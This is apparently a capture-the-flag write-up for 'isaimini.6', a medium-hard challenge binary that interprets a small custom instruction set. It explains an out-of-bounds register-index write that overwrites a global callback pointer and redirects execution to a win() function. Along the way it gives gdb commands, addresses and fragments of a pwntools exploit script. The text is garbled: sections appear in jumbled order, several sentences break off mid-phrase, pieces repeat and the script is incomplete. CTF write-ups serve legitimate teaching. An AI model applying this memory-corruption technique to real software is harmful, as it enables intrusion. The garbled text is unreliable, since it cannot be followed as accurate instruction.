Isaimini.6 Direct

void win(void) puts("Success!"); // In the real challenge this prints the flag, e.g. // system("/bin/cat flag.txt");

binary = "./isaimini.6" elf = ELF(binary)

# Send the payload via stdin printf "$payload" | ./isaimini.6 : isaimini.6

Category : Reverse Engineering / Binary Exploitation Difficulty : Medium – Hard (depending on your familiarity with custom byte‑code interpreters) Points : 425 (CTF‑2024) 1. Challenge Overview The challenge provides a single 64‑bit ELF binary called isaimini.6 and a small text file named input.txt (optional). The binary is an interpreter for a tiny “ISA‑mini” instruction set (the name comes from the challenge author’s earlier “isa‑mini” series).

# Send payload p = process(binary) p.send(payload) print(p.recvall().decode()) Running this script prints the flag (or “Success!”). | Technique | Why it mattered | |-----------|-----------------| | Static analysis of a stripped binary | Ghidra’s decompiler can void win(void) puts("Success

Putting it together (little‑endian encoding for the immediate):

*(uint64_t*)regs[dst] = regs[src]; regs[dst] is taken directly from a user‑controlled register index. The interpreter that dst is within 0‑15 . If we use a register index of 0x10 (16) , regs[16] points past the allocated register array, landing in the .bss area where the global variable callback lives: The binary is an interpreter for a tiny

Success! If the real binary prints the flag, you will see it after Success! . (gdb) file isaimini.6 (gdb) set disassembly-flavor intel (gdb) break *0x00401430 # break at start of execute() (gdb) run (gdb) x/4gx $rsp # view saved RIP after HLT (gdb) x/gx 0x00603010 # examine callback after ST (gdb) continue You should see that after the ST instruction the memory at 0x00603010 holds 0x401b10 . When the interpreter reaches the final if(callback) check, it jumps to that address and prints the success message. 8. Full Exploit Script (Python / pwntools) #!/usr/bin/env python3 from pwn import *